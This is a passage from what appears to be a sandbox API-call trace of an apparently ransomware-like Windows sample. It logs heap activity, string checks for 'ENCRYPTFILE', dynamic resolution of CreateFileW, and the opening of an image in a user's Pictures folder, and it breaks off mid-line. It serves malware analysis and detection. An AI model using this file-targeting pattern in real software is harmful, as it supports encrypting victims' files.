HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0089.209] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0089.209] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0089.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0089.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0089.209] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0089.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0089.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0089.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0089.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0089.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0089.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0089.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0089.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0089.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0089.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0089.211] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0089.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0089.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0089.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0089.211] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0089.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0089.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0089.211] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kr_O D2ok83jLZ-Nq.jpg", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x160e5c10, ftCreationTime.dwHighDateTime=0x1d5ed64, ftLastAccessTime.dwLowDateTime=0x8e696ff0, ftLastAccessTime.dwHighDateTime=0x1d5e1c1, ftLastWriteTime.dwLowDateTime=0x8e696ff0, ftLastWriteTime.dwHighDateTime=0x1d5e1c1, nFileSizeHigh=0x0, nFileSizeLow=0x3e7a, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="kr_O D2ok83jLZ-Nq.jpg", cAlternateFileName="KR_OD2~1.JPG")) returned 0x41ac540 [0089.212] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0089.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0089.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0089.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0089.212] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0089.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0089.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0089.212] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cf8 [0089.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0089.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0089.213] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0089.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0089.213] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0089.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0089.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0089.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0089.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0089.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2190 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0089.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e30 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0089.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0089.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0089.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0089.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0089.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0089.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0089.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0089.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0089.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0089.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0089.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0089.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0089.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0089.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.217] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0089.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.218] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0089.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca448, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.219] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0089.220] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\kr_O D2ok83jLZ-Nq.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\kr_o d2ok83jlz-nq.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0089.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 